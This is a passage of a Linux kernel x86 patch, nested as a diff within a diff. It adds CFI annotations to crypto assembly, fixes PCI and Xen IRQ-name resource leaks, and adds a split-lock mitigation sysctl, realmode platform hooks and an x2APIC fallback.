+diff --git a/arch/x86/crypto/sha512-avx-asm.S b/arch/x86/crypto/sha512-avx-asm.S
+index 1fefe6dd3a9e2..b0984f19fdb40 100644
+--- a/arch/x86/crypto/sha512-avx-asm.S
++++ b/arch/x86/crypto/sha512-avx-asm.S
+@@ -48,6 +48,7 @@
+ ########################################################################
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ .text
+ 
+@@ -273,7 +274,7 @@ frame_size = frame_WK + WK_SIZE
+ # of SHA512 message blocks.
+ # "blocks" is the message length in SHA512 blocks
+ ########################################################################
+-SYM_FUNC_START(sha512_transform_avx)
++SYM_TYPED_FUNC_START(sha512_transform_avx)
+ 	test msglen, msglen
+ 	je nowork
+ 
+diff --git a/arch/x86/crypto/sha512-avx2-asm.S b/arch/x86/crypto/sha512-avx2-asm.S
+index 5cdaab7d69015..b1ca99055ef99 100644
+--- a/arch/x86/crypto/sha512-avx2-asm.S
++++ b/arch/x86/crypto/sha512-avx2-asm.S
+@@ -50,6 +50,7 @@
+ ########################################################################
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ .text
+ 
+@@ -565,7 +566,7 @@ frame_size = frame_CTX + CTX_SIZE
+ # of SHA512 message blocks.
+ # "blocks" is the message length in SHA512 blocks
+ ########################################################################
+-SYM_FUNC_START(sha512_transform_rorx)
++SYM_TYPED_FUNC_START(sha512_transform_rorx)
+ 	# Save GPRs
+ 	push	%rbx
+ 	push	%r12
+diff --git a/arch/x86/crypto/sha512-ssse3-asm.S b/arch/x86/crypto/sha512-ssse3-asm.S
+index b84c22e06c5f7..c06afb5270e5f 100644
+--- a/arch/x86/crypto/sha512-ssse3-asm.S
++++ b/arch/x86/crypto/sha512-ssse3-asm.S
+@@ -48,6 +48,7 @@
+ ########################################################################
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ .text
+ 
+@@ -274,7 +275,7 @@ frame_size = frame_WK + WK_SIZE
+ # of SHA512 message blocks.
+ # "blocks" is the message length in SHA512 blocks.
+ ########################################################################
+-SYM_FUNC_START(sha512_transform_ssse3)
++SYM_TYPED_FUNC_START(sha512_transform_ssse3)
+ 
+ 	test msglen, msglen
+ 	je nowork
+diff --git a/arch/x86/crypto/sm3-avx-asm_64.S b/arch/x86/crypto/sm3-avx-asm_64.S
+index b12b9efb5ec51..8fc5ac681fd63 100644
+--- a/arch/x86/crypto/sm3-avx-asm_64.S
++++ b/arch/x86/crypto/sm3-avx-asm_64.S
+@@ -12,6 +12,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/frame.h>
+ 
+ /* Context structure */
+@@ -328,7 +329,7 @@
+  *                        const u8 *data, int nblocks);
+  */
+ .align 16
+-SYM_FUNC_START(sm3_transform_avx)
++SYM_TYPED_FUNC_START(sm3_transform_avx)
+ 	/* input:
+ 	 *	%rdi: ctx, CTX
+ 	 *	%rsi: data (64*nblks bytes)
+diff --git a/arch/x86/crypto/sm4-aesni-avx-asm_64.S b/arch/x86/crypto/sm4-aesni-avx-asm_64.S
+index 4767ab61ff489..22b6560eb9e1e 100644
+--- a/arch/x86/crypto/sm4-aesni-avx-asm_64.S
++++ b/arch/x86/crypto/sm4-aesni-avx-asm_64.S
+@@ -14,6 +14,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/frame.h>
+ 
+ #define rRIP         (%rip)
+@@ -420,7 +421,7 @@ SYM_FUNC_END(sm4_aesni_avx_crypt8)
+  *                                 const u8 *src, u8 *iv)
+  */
+ .align 8
+-SYM_FUNC_START(sm4_aesni_avx_ctr_enc_blk8)
++SYM_TYPED_FUNC_START(sm4_aesni_avx_ctr_enc_blk8)
+ 	/* input:
+ 	 *	%rdi: round key array, CTX
+ 	 *	%rsi: dst (8 blocks)
+@@ -495,7 +496,7 @@ SYM_FUNC_END(sm4_aesni_avx_ctr_enc_blk8)
+  *                                 const u8 *src, u8 *iv)
+  */
+ .align 8
+-SYM_FUNC_START(sm4_aesni_avx_cbc_dec_blk8)
++SYM_TYPED_FUNC_START(sm4_aesni_avx_cbc_dec_blk8)
+ 	/* input:
+ 	 *	%rdi: round key array, CTX
+ 	 *	%rsi: dst (8 blocks)
+@@ -545,7 +546,7 @@ SYM_FUNC_END(sm4_aesni_avx_cbc_dec_blk8)
+  *                                 const u8 *src, u8 *iv)
+  */
+ .align 8
+-SYM_FUNC_START(sm4_aesni_avx_cfb_dec_blk8)
++SYM_TYPED_FUNC_START(sm4_aesni_avx_cfb_dec_blk8)
+ 	/* input:
+ 	 *	%rdi: round key array, CTX
+ 	 *	%rsi: dst (8 blocks)
+diff --git a/arch/x86/crypto/sm4-aesni-avx2-asm_64.S b/arch/x86/crypto/sm4-aesni-avx2-asm_64.S
+index 4732fe8bb65b6..23ee39a8ada8c 100644
+--- a/arch/x86/crypto/sm4-aesni-avx2-asm_64.S
++++ b/arch/x86/crypto/sm4-aesni-avx2-asm_64.S
+@@ -14,6 +14,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/frame.h>
+ 
+ #define rRIP         (%rip)
+@@ -282,7 +283,7 @@ SYM_FUNC_END(__sm4_crypt_blk16)
+  *                                   const u8 *src, u8 *iv)
+  */
+ .align 8
+-SYM_FUNC_START(sm4_aesni_avx2_ctr_enc_blk16)
++SYM_TYPED_FUNC_START(sm4_aesni_avx2_ctr_enc_blk16)
+ 	/* input:
+ 	 *	%rdi: round key array, CTX
+ 	 *	%rsi: dst (16 blocks)
+@@ -395,7 +396,7 @@ SYM_FUNC_END(sm4_aesni_avx2_ctr_enc_blk16)
+  *                                   const u8 *src, u8 *iv)
+  */
+ .align 8
+-SYM_FUNC_START(sm4_aesni_avx2_cbc_dec_blk16)
++SYM_TYPED_FUNC_START(sm4_aesni_avx2_cbc_dec_blk16)
+ 	/* input:
+ 	 *	%rdi: round key array, CTX
+ 	 *	%rsi: dst (16 blocks)
+@@ -449,7 +450,7 @@ SYM_FUNC_END(sm4_aesni_avx2_cbc_dec_blk16)
+  *                                   const u8 *src, u8 *iv)
+  */
+ .align 8
+-SYM_FUNC_START(sm4_aesni_avx2_cfb_dec_blk16)
++SYM_TYPED_FUNC_START(sm4_aesni_avx2_cfb_dec_blk16)
+ 	/* input:
+ 	 *	%rdi: round key array, CTX
+ 	 *	%rsi: dst (16 blocks)
+diff --git a/arch/x86/events/intel/uncore_snb.c b/arch/x86/events/intel/uncore_snb.c
+index 1ef4f7861e2ec..1f4869227efb9 100644
+--- a/arch/x86/events/intel/uncore_snb.c
++++ b/arch/x86/events/intel/uncore_snb.c
+@@ -1338,6 +1338,7 @@ static void __uncore_imc_init_box(struct intel_uncore_box *box,
+ 	/* MCHBAR is disabled */
+ 	if (!(mch_bar & BIT(0))) {
+ 		pr_warn("perf uncore: MCHBAR is disabled. Failed to map IMC free-running counters.\n");
++		pci_dev_put(pdev);
+ 		return;
+ 	}
+ 	mch_bar &= ~BIT(0);
+@@ -1352,6 +1353,8 @@ static void __uncore_imc_init_box(struct intel_uncore_box *box,
+ 	box->io_addr = ioremap(addr, type->mmio_map_size);
+ 	if (!box->io_addr)
+ 		pr_warn("perf uncore: Failed to ioremap for %s.\n", type->name);
++
++	pci_dev_put(pdev);
+ }
+ 
+ static void tgl_uncore_imc_freerunning_init_box(struct intel_uncore_box *box)
+diff --git a/arch/x86/events/intel/uncore_snbep.c b/arch/x86/events/intel/uncore_snbep.c
+index ed869443efb21..fcd95e93f479a 100644
+--- a/arch/x86/events/intel/uncore_snbep.c
++++ b/arch/x86/events/intel/uncore_snbep.c
+@@ -2891,6 +2891,7 @@ static bool hswep_has_limit_sbox(unsigned int device)
+ 		return false;
+ 
+ 	pci_read_config_dword(dev, HSWEP_PCU_CAPID4_OFFET, &capid4);
++	pci_dev_put(dev);
+ 	if (!hswep_get_chop(capid4))
+ 		return true;
+ 
+@@ -4492,6 +4493,8 @@ static int sad_cfg_iio_topology(struct intel_uncore_type *type, u8 *sad_pmon_map
+ 		type->topology = NULL;
+ 	}
+ 
++	pci_dev_put(dev);
++
+ 	return ret;
+ }
+ 
+@@ -4857,6 +4860,8 @@ static int snr_uncore_mmio_map(struct intel_uncore_box *box,
+ 
+ 	addr += box_ctl;
+ 
++	pci_dev_put(pdev);
++
+ 	box->io_addr = ioremap(addr, type->mmio_map_size);
+ 	if (!box->io_addr) {
+ 		pr_warn("perf uncore: Failed to ioremap for %s.\n", type->name);
+diff --git a/arch/x86/hyperv/hv_init.c b/arch/x86/hyperv/hv_init.c
+index a269049a43ce3..85863b9c9e684 100644
+--- a/arch/x86/hyperv/hv_init.c
++++ b/arch/x86/hyperv/hv_init.c
+@@ -535,8 +535,6 @@ void hyperv_cleanup(void)
+ 	union hv_x64_msr_hypercall_contents hypercall_msr;
+ 	union hv_reference_tsc_msr tsc_msr;
+ 
+-	unregister_syscore_ops(&hv_syscore_ops);
+-
+ 	/* Reset our OS id */
+ 	wrmsrl(HV_X64_MSR_GUEST_OS_ID, 0);
+ 	hv_ghcb_msr_write(HV_X64_MSR_GUEST_OS_ID, 0);
+diff --git a/arch/x86/include/asm/apic.h b/arch/x86/include/asm/apic.h
+index 3415321c8240c..3216da7074bad 100644
+--- a/arch/x86/include/asm/apic.h
++++ b/arch/x86/include/asm/apic.h
+@@ -249,7 +249,6 @@ static inline u64 native_x2apic_icr_read(void)
+ extern int x2apic_mode;
+ extern int x2apic_phys;
+ extern void __init x2apic_set_max_apicid(u32 apicid);
+-extern void __init check_x2apic(void);
+ extern void x2apic_setup(void);
+ static inline int x2apic_enabled(void)
+ {
+@@ -258,13 +257,13 @@ static inline int x2apic_enabled(void)
+ 
+ #define x2apic_supported()	(boot_cpu_has(X86_FEATURE_X2APIC))
+ #else /* !CONFIG_X86_X2APIC */
+-static inline void check_x2apic(void) { }
+ static inline void x2apic_setup(void) { }
+ static inline int x2apic_enabled(void) { return 0; }
+ 
+ #define x2apic_mode		(0)
+ #define	x2apic_supported()	(0)
+ #endif /* !CONFIG_X86_X2APIC */
++extern void __init check_x2apic(void);
+ 
+ struct irq_data;
+ 
+diff --git a/arch/x86/include/asm/realmode.h b/arch/x86/include/asm/realmode.h
+index fd6f6e5b755a7..a336feef0af14 100644
+--- a/arch/x86/include/asm/realmode.h
++++ b/arch/x86/include/asm/realmode.h
+@@ -91,6 +91,7 @@ static inline void set_real_mode_mem(phys_addr_t mem)
+ 
+ void reserve_real_mode(void);
+ void load_trampoline_pgtable(void);
++void init_real_mode(void);
+ 
+ #endif /* __ASSEMBLY__ */
+ 
+diff --git a/arch/x86/include/asm/x86_init.h b/arch/x86/include/asm/x86_init.h
+index e9170457697e4..c1c8c581759d6 100644
+--- a/arch/x86/include/asm/x86_init.h
++++ b/arch/x86/include/asm/x86_init.h
+@@ -285,6 +285,8 @@ struct x86_hyper_runtime {
+  * 				possible in x86_early_init_platform_quirks() by
+  * 				only using the current x86_hardware_subarch
+  * 				semantics.
++ * @realmode_reserve:		reserve memory for realmode trampoline
++ * @realmode_init:		initialize realmode trampoline
+  * @hyper:			x86 hypervisor specific runtime callbacks
+  */
+ struct x86_platform_ops {
+@@ -301,6 +303,8 @@ struct x86_platform_ops {
+ 	void (*apic_post_init)(void);
+ 	struct x86_legacy_features legacy;
+ 	void (*set_legacy_features)(void);
++	void (*realmode_reserve)(void);
++	void (*realmode_init)(void);
+ 	struct x86_hyper_runtime hyper;
+ 	struct x86_guest guest;
+ };
+diff --git a/arch/x86/kernel/apic/apic.c b/arch/x86/kernel/apic/apic.c
+index c6876d3ea4b17..20d9a604da7c4 100644
+--- a/arch/x86/kernel/apic/apic.c
++++ b/arch/x86/kernel/apic/apic.c
+@@ -1931,16 +1931,19 @@ void __init check_x2apic(void)
+ 	}
+ }
+ #else /* CONFIG_X86_X2APIC */
+-static int __init validate_x2apic(void)
++void __init check_x2apic(void)
+ {
+ 	if (!apic_is_x2apic_enabled())
+-		return 0;
++		return;
+ 	/*
+-	 * Checkme: Can we simply turn off x2apic here instead of panic?
++	 * Checkme: Can we simply turn off x2APIC here instead of disabling the APIC?
+ 	 */
+-	panic("BIOS has enabled x2apic but kernel doesn't support x2apic, please disable x2apic in BIOS.\n");
++	pr_err("Kernel does not support x2APIC, please recompile with CONFIG_X86_X2APIC.\n");
++	pr_err("Disabling APIC, expect reduced performance and functionality.\n");
++
++	disable_apic = 1;
++	setup_clear_cpu_cap(X86_FEATURE_APIC);
+ }
+-early_initcall(validate_x2apic);
+ 
+ static inline void try_to_enable_x2apic(int remap_mode) { }
+ static inline void __x2apic_enable(void) { }
+diff --git a/arch/x86/kernel/cpu/intel.c b/arch/x86/kernel/cpu/intel.c
+index 2d7ea5480ec33..4278996504833 100644
+--- a/arch/x86/kernel/cpu/intel.c
++++ b/arch/x86/kernel/cpu/intel.c
+@@ -1034,8 +1034,32 @@ static const struct {
+ 
+ static struct ratelimit_state bld_ratelimit;
+ 
++static unsigned int sysctl_sld_mitigate = 1;
+ static DEFINE_SEMAPHORE(buslock_sem);
+ 
++#ifdef CONFIG_PROC_SYSCTL
++static struct ctl_table sld_sysctls[] = {
++	{
++		.procname       = "split_lock_mitigate",
++		.data           = &sysctl_sld_mitigate,
++		.maxlen         = sizeof(unsigned int),
++		.mode           = 0644,
++		.proc_handler	= proc_douintvec_minmax,
++		.extra1         = SYSCTL_ZERO,
++		.extra2         = SYSCTL_ONE,
++	},
++	{}
++};
++
++static int __init sld_mitigate_sysctl_init(void)
++{
++	register_sysctl_init("kernel", sld_sysctls);
++	return 0;
++}
++
++late_initcall(sld_mitigate_sysctl_init);
++#endif
++
+ static inline bool match_option(const char *arg, int arglen, const char *opt)
+ {
+ 	int len = strlen(opt), ratelimit;
+@@ -1146,12 +1170,20 @@ static void split_lock_init(void)
+ 		split_lock_verify_msr(sld_state != sld_off);
+ }
+ 
+-static void __split_lock_reenable(struct work_struct *work)
++static void __split_lock_reenable_unlock(struct work_struct *work)
+ {
+ 	sld_update_msr(true);
+ 	up(&buslock_sem);
+ }
+ 
++static DECLARE_DELAYED_WORK(sl_reenable_unlock, __split_lock_reenable_unlock);
++
++static void __split_lock_reenable(struct work_struct *work)
++{
++	sld_update_msr(true);
++}
++static DECLARE_DELAYED_WORK(sl_reenable, __split_lock_reenable);
++
+ /*
+  * If a CPU goes offline with pending delayed work to re-enable split lock
+  * detection then the delayed work will be executed on some other CPU. That
+@@ -1169,10 +1201,9 @@ static int splitlock_cpu_offline(unsigned int cpu)
+ 	return 0;
+ }
+ 
+-static DECLARE_DELAYED_WORK(split_lock_reenable, __split_lock_reenable);
+-
+ static void split_lock_warn(unsigned long ip)
+ {
++	struct delayed_work *work;
+ 	int cpu;
+ 
+ 	if (!current->reported_split_lock)
+@@ -1180,14 +1211,26 @@ static void split_lock_warn(unsigned long ip)
+ 				    current->comm, current->pid, ip);
+ 	current->reported_split_lock = 1;
+ 
+-	/* misery factor #1, sleep 10ms before trying to execute split lock */
+-	if (msleep_interruptible(10) > 0)
+-		return;
+-	/* Misery factor #2, only allow one buslocked disabled core at a time */
+-	if (down_interruptible(&buslock_sem) == -EINTR)
+-		return;
++	if (sysctl_sld_mitigate) {
++		/*
++		 * misery factor #1:
++		 * sleep 10ms before trying to execute split lock.
++		 */
++		if (msleep_interruptible(10) > 0)
++			return;
++		/*
++		 * Misery factor #2:
++		 * only allow one buslocked disabled core at a time.
++		 */
++		if (down_interruptible(&buslock_sem) == -EINTR)
++			return;
++		work = &sl_reenable_unlock;
++	} else {
++		work = &sl_reenable;
++	}
++
+ 	cpu = get_cpu();
+-	schedule_delayed_work_on(cpu, &split_lock_reenable, 2);
++	schedule_delayed_work_on(cpu, work, 2);
+ 
+ 	/* Disable split lock detection on this CPU to make progress */
+ 	sld_update_msr(false);
+diff --git a/arch/x86/kernel/cpu/sgx/encl.c b/arch/x86/kernel/cpu/sgx/encl.c
+index 1ec20807de1e8..2c258255a6296 100644
+--- a/arch/x86/kernel/cpu/sgx/encl.c
++++ b/arch/x86/kernel/cpu/sgx/encl.c
+@@ -680,11 +680,15 @@ const struct vm_operations_struct sgx_vm_ops = {
+ void sgx_encl_release(struct kref *ref)
+ {
+ 	struct sgx_encl *encl = container_of(ref, struct sgx_encl, refcount);
++	unsigned long max_page_index = PFN_DOWN(encl->base + encl->size - 1);
+ 	struct sgx_va_page *va_page;
+ 	struct sgx_encl_page *entry;
+-	unsigned long index;
++	unsigned long count = 0;
++
++	XA_STATE(xas, &encl->page_array, PFN_DOWN(encl->base));
+ 
+-	xa_for_each(&encl->page_array, index, entry) {
++	xas_lock(&xas);
++	xas_for_each(&xas, entry, max_page_index) {
+ 		if (entry->epc_page) {
+ 			/*
+ 			 * The page and its radix tree entry cannot be freed
+@@ -699,9 +703,20 @@ void sgx_encl_release(struct kref *ref)
+ 		}
+ 
+ 		kfree(entry);
+-		/* Invoke scheduler to prevent soft lockups. */
+-		cond_resched();
++		/*
++		 * Invoke scheduler on every XA_CHECK_SCHED iteration
++		 * to prevent soft lockups.
++		 */
++		if (!(++count % XA_CHECK_SCHED)) {
++			xas_pause(&xas);
++			xas_unlock(&xas);
++
++			cond_resched();
++
++			xas_lock(&xas);
++		}
+ 	}
++	xas_unlock(&xas);
+ 
+ 	xa_destroy(&encl->page_array);
+ 
+diff --git a/arch/x86/kernel/setup.c b/arch/x86/kernel/setup.c
+index 216fee7144eef..892609cde4a20 100644
+--- a/arch/x86/kernel/setup.c
++++ b/arch/x86/kernel/setup.c
+@@ -1175,7 +1175,7 @@ void __init setup_arch(char **cmdline_p)
+ 	 * Moreover, on machines with SandyBridge graphics or in setups that use
+ 	 * crashkernel the entire 1M is reserved anyway.
+ 	 */
+-	reserve_real_mode();
++	x86_platform.realmode_reserve();
+ 
+ 	init_mem_mapping();
+ 
+diff --git a/arch/x86/kernel/uprobes.c b/arch/x86/kernel/uprobes.c
+index b63cf8f7745ee..6c07f6daaa227 100644
+--- a/arch/x86/kernel/uprobes.c
++++ b/arch/x86/kernel/uprobes.c
+@@ -722,8 +722,9 @@ static int branch_setup_xol_ops(struct arch_uprobe *auprobe, struct insn *insn)
+ 	switch (opc1) {
+ 	case 0xeb:	/* jmp 8 */
+ 	case 0xe9:	/* jmp 32 */
+-	case 0x90:	/* prefix* + nop; same as jmp with .offs = 0 */
+ 		break;
++	case 0x90:	/* prefix* + nop; same as jmp with .offs = 0 */
++		goto setup;
+ 
+ 	case 0xe8:	/* call relative */
+ 		branch_clear_offset(auprobe, insn);
+@@ -753,6 +754,7 @@ static int branch_setup_xol_ops(struct arch_uprobe *auprobe, struct insn *insn)
+ 			return -ENOTSUPP;
+ 	}
+ 
++setup:
+ 	auprobe->branch.opc1 = opc1;
+ 	auprobe->branch.ilen = insn->length;
+ 	auprobe->branch.offs = insn->immediate.value;
+diff --git a/arch/x86/kernel/x86_init.c b/arch/x86/kernel/x86_init.c
+index 57353519bc119..ef80d361b4632 100644
+--- a/arch/x86/kernel/x86_init.c
++++ b/arch/x86/kernel/x86_init.c
+@@ -25,6 +25,7 @@
+ #include <asm/iommu.h>
+ #include <asm/mach_traps.h>
+ #include <asm/irqdomain.h>
++#include <asm/realmode.h>
+ 
+ void x86_init_noop(void) { }
+ void __init x86_init_uint_noop(unsigned int unused) { }
+@@ -145,6 +146,8 @@ struct x86_platform_ops x86_platform __ro_after_init = {
+ 	.get_nmi_reason			= default_get_nmi_reason,
+ 	.save_sched_clock_state		= tsc_save_sched_clock_state,
+ 	.restore_sched_clock_state	= tsc_restore_sched_clock_state,
++	.realmode_reserve		= reserve_real_mode,
++	.realmode_init			= init_real_mode,
+ 	.hyper.pin_vcpu			= x86_op_int_noop,
+ 
+ 	.guest = {
+diff --git a/arch/x86/realmode/init.c b/arch/x86/realmode/init.c
+index 41d7669a97ad1..af565816d2ba6 100644
+--- a/arch/x86/realmode/init.c
++++ b/arch/x86/realmode/init.c
+@@ -200,14 +200,18 @@ static void __init set_real_mode_permissions(void)
+ 	set_memory_x((unsigned long) text_start, text_size >> PAGE_SHIFT);
+ }
+ 
+-static int __init init_real_mode(void)
++void __init init_real_mode(void)
+ {
+ 	if (!real_mode_header)
+ 		panic("Real mode trampoline was not allocated");
+ 
+ 	setup_real_mode();
+ 	set_real_mode_permissions();
++}
+ 
++static int __init do_init_real_mode(void)
++{
++	x86_platform.realmode_init();
+ 	return 0;
+ }
+-early_initcall(init_real_mode);
++early_initcall(do_init_real_mode);
+diff --git a/arch/x86/xen/enlighten_pv.c b/arch/x86/xen/enlighten_pv.c
+index 038da45f057a7..8944726255c9c 100644
+--- a/arch/x86/xen/enlighten_pv.c
++++ b/arch/x86/xen/enlighten_pv.c
+@@ -1266,6 +1266,8 @@ asmlinkage __visible void __init xen_start_kernel(struct start_info *si)
+ 	xen_vcpu_info_reset(0);
+ 
+ 	x86_platform.get_nmi_reason = xen_get_nmi_reason;
++	x86_platform.realmode_reserve = x86_init_noop;
++	x86_platform.realmode_init = x86_init_noop;
+ 
+ 	x86_init.resources.memory_setup = xen_memory_setup;
+ 	x86_init.irqs.intr_mode_select	= x86_init_noop;
+diff --git a/arch/x86/xen/smp.c b/arch/x86/xen/smp.c
+index c3e1f9a7d43aa..4b0d6fff88de5 100644
+--- a/arch/x86/xen/smp.c
++++ b/arch/x86/xen/smp.c
+@@ -32,30 +32,30 @@ static irqreturn_t xen_reschedule_interrupt(int irq, void *dev_id)
+ 
+ void xen_smp_intr_free(unsigned int cpu)
+ {
++	kfree(per_cpu(xen_resched_irq, cpu).name);
++	per_cpu(xen_resched_irq, cpu).name = NULL;
+ 	if (per_cpu(xen_resched_irq, cpu).irq >= 0) {
+ 		unbind_from_irqhandler(per_cpu(xen_resched_irq, cpu).irq, NULL);
+ 		per_cpu(xen_resched_irq, cpu).irq = -1;
+-		kfree(per_cpu(xen_resched_irq, cpu).name);
+-		per_cpu(xen_resched_irq, cpu).name = NULL;
+ 	}
++	kfree(per_cpu(xen_callfunc_irq, cpu).name);
++	per_cpu(xen_callfunc_irq, cpu).name = NULL;
+ 	if (per_cpu(xen_callfunc_irq, cpu).irq >= 0) {
+ 		unbind_from_irqhandler(per_cpu(xen_callfunc_irq, cpu).irq, NULL);
+ 		per_cpu(xen_callfunc_irq, cpu).irq = -1;
+-		kfree(per_cpu(xen_callfunc_irq, cpu).name);
+-		per_cpu(xen_callfunc_irq, cpu).name = NULL;
+ 	}
++	kfree(per_cpu(xen_debug_irq, cpu).name);
++	per_cpu(xen_debug_irq, cpu).name = NULL;
+ 	if (per_cpu(xen_debug_irq, cpu).irq >= 0) {
+ 		unbind_from_irqhandler(per_cpu(xen_debug_irq, cpu).irq, NULL);
+ 		per_cpu(xen_debug_irq, cpu).irq = -1;
+-		kfree(per_cpu(xen_debug_irq, cpu).name);
+-		per_cpu(xen_debug_irq, cpu).name = NULL;
+ 	}
++	kfree(per_cpu(xen_callfuncsingle_irq, cpu).name);
++	per_cpu(xen_callfuncsingle_irq, cpu).name = NULL;
+ 	if (per_cpu(xen_callfuncsingle_irq, cpu).irq >= 0) {
+ 		unbind_from_irqhandler(per_cpu(xen_callfuncsingle_irq, cpu).irq,
+ 				       NULL);
+ 		per_cpu(xen_callfuncsingle_irq, cpu).irq = -1;
+-		kfree(per_cpu(xen_callfuncsingle_irq, cpu).name);
+-		per_cpu(xen_callfuncsingle_irq, cpu).name = NULL;
+ 	}
+ }
+ 
+@@ -65,6 +65,7 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	char *resched_name, *callfunc_name, *debug_name;
+ 
+ 	resched_name = kasprintf(GFP_KERNEL, "resched%d", cpu);
++	per_cpu(xen_resched_irq, cpu).name = resched_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_RESCHEDULE_VECTOR,
+ 				    cpu,
+ 				    xen_reschedule_interrupt,
+@@ -74,9 +75,9 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	if (rc < 0)
+ 		goto fail;
+ 	per_cpu(xen_resched_irq, cpu).irq = rc;
+-	per_cpu(xen_resched_irq, cpu).name = resched_name;
+ 
+ 	callfunc_name = kasprintf(GFP_KERNEL, "callfunc%d", cpu);
++	per_cpu(xen_callfunc_irq, cpu).name = callfunc_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_CALL_FUNCTION_VECTOR,
+ 				    cpu,
+ 				    xen_call_function_interrupt,
+@@ -86,10 +87,10 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	if (rc < 0)
+ 		goto fail;
+ 	per_cpu(xen_callfunc_irq, cpu).irq = rc;
+-	per_cpu(xen_callfunc_irq, cpu).name = callfunc_name;
+ 
+ 	if (!xen_fifo_events) {
+ 		debug_name = kasprintf(GFP_KERNEL, "debug%d", cpu);
++		per_cpu(xen_debug_irq, cpu).name = debug_name;
+ 		rc = bind_virq_to_irqhandler(VIRQ_DEBUG, cpu,
+ 					     xen_debug_interrupt,
+ 					     IRQF_PERCPU | IRQF_NOBALANCING,
+@@ -97,10 +98,10 @@ int xen_smp_intr_init(unsigned int cpu)
+ 		if (rc < 0)
+ 			goto fail;
+ 		per_cpu(xen_debug_irq, cpu).irq = rc;
+-		per_cpu(xen_debug_irq, cpu).name = debug_name;
+ 	}
+ 
+ 	callfunc_name = kasprintf(GFP_KERNEL, "callfuncsingle%d", cpu);
++	per_cpu(xen_callfuncsingle_irq, cpu).name = callfunc_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_CALL_FUNCTION_SINGLE_VECTOR,
+ 				    cpu,
+ 				    xen_call_function_single_interrupt,
+@@ -110,7 +111,6 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	if (rc < 0)
+ 		goto fail;
+ 	per_cpu(xen_callfuncsingle_irq, cpu).irq = rc;
+-	per_cpu(xen_callfuncsingle_irq, cpu).name = callfunc_name;
+ 
+ 	return 0;
+ 
+diff --git a/arch/x86/xen/smp_pv.c b/arch/x86/xen/smp_pv.c
+index 480be82e9b7be..6175f2c5c8224 100644
+--- a/arch/x86/xen/smp_pv.c
++++ b/arch/x86/xen/smp_pv.c
+@@ -97,18 +97,18 @@ asmlinkage __visible void cpu_bringup_and_idle(void)
+ 
+ void xen_smp_intr_free_pv(unsigned int cpu)
+ {
++	kfree(per_cpu(xen_irq_work, cpu).name);
++	per_cpu(xen_irq_work, cpu).name = NULL;
+ 	if (per_cpu(xen_irq_work, cpu).irq >= 0) {
+ 		unbind_from_irqhandler(per_cpu(xen_irq_work, cpu).irq, NULL);
+ 		per_cpu(xen_irq_work, cpu).irq = -1;
+-		kfree(per_cpu(xen_irq_work, cpu).name);
+-		per_cpu(xen_irq_work, cpu).name = NULL;
+ 	}
+ 
++	kfree(per_cpu(xen_pmu_irq, cpu).name);
++	per_cpu(xen_pmu_irq, cpu).name = NULL;
+ 	if (per_cpu(xen_pmu_irq, cpu).irq >= 0) {
+ 		unbind_from_irqhandler(per_cpu(xen_pmu_irq, cpu).irq, NULL);
+ 		per_cpu(xen_pmu_irq, cpu).irq = -1;
+-		kfree(per_cpu(xen_pmu_irq, cpu).name);
+-		per_cpu(xen_pmu_irq, cpu).name = NULL;
+ 	}
+ }
+ 
+@@ -118,6 +118,7 @@ int xen_smp_intr_init_pv(unsigned int cpu)
+ 	char *callfunc_name, *pmu_name;
+ 
+ 	callfunc_name = kasprintf(GFP_KERNEL, "irqwork%d", cpu);
++	per_cpu(xen_irq_work, cpu).name = callfunc_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_IRQ_WORK_VECTOR,
+ 				    cpu,
+ 				    xen_irq_work_interrupt,
+@@ -127,10 +128,10 @@ int xen_smp_intr_init_pv(unsigned int cpu)
+ 	if (rc < 0)
+ 		goto fail;
+ 	per_cpu(xen_irq_work, cpu).irq = rc;
+-	per_cpu(xen_irq_work, cpu).name = callfunc_name;
+ 
+ 	if (is_xen_pmu) {
+ 		pmu_name = kasprintf(GFP_KERNEL, "pmu%d", cpu);
++		per_cpu(xen_pmu_irq, cpu).name = pmu_name;
+ 		rc = bind_virq_to_irqhandler(VIRQ_XENPMU, cpu,
+ 					     xen_pmu_irq_handler,
+ 					     IRQF_PERCPU|IRQF_NOBALANCING,
+@@ -138,7 +139,6 @@ int xen_smp_intr_init_pv(unsigned int cpu)
+ 		if (rc < 0)
+ 			goto fail;
+ 		per_cpu(xen_pmu_irq, cpu).irq = rc;
+-		per_cpu(xen_pmu_irq, cpu).name = pmu_name;
+ 	}
+ 
+ 	return 0;
+diff --git a/arch/x86/xen/spinlock.c b/arch/x86/xen/spinlock.c
+index 043c73dfd2c98..5c6fc16e4b925 100644
+--- a/arch/x86/xen/spinlock.c
++++ b/arch/x86/xen/spinlock.c
+@@ -75,6 +75,7 @@ void xen_init_lock_cpu(int cpu)
+ 	     cpu, per_cpu(lock_kicker_irq, cpu));
+ 
+ 	name = kasprintf(GFP_KERNEL, "spinlock%d", cpu);
++	per_cpu(irq_name, cpu) = name;
+ 	irq = bind_ipi_to_irqhandler(XEN_SPIN_UNLOCK_VECTOR,
+ 				     cpu,
+ 				     dummy_handler,
+@@ -85,7 +86,6 @@ void xen_init_lock_cpu(int cpu)
+ 	if (irq >= 0) {
+ 		disable_irq(irq); /* make sure it's never delivered */
+ 		per_cpu(lock_kicker_irq, cpu) = irq;
+-		per_cpu(irq_name, cpu) = name;
+ 	}
+ 
+ 	printk("cpu %d spinlock event irq %d\n", cpu, irq);
+@@ -98,6 +98,8 @@ void xen_uninit_lock_cpu(int cpu)
+ 	if (!xen_pvspin)
+ 		return;
+ 
++	kfree(per_cpu(irq_name, cpu));
++	per_cpu(irq_name, cpu) = NULL;
+ 	/*
+ 	 * When booting the kernel with 'mitigations=auto,nosmt', the secondary
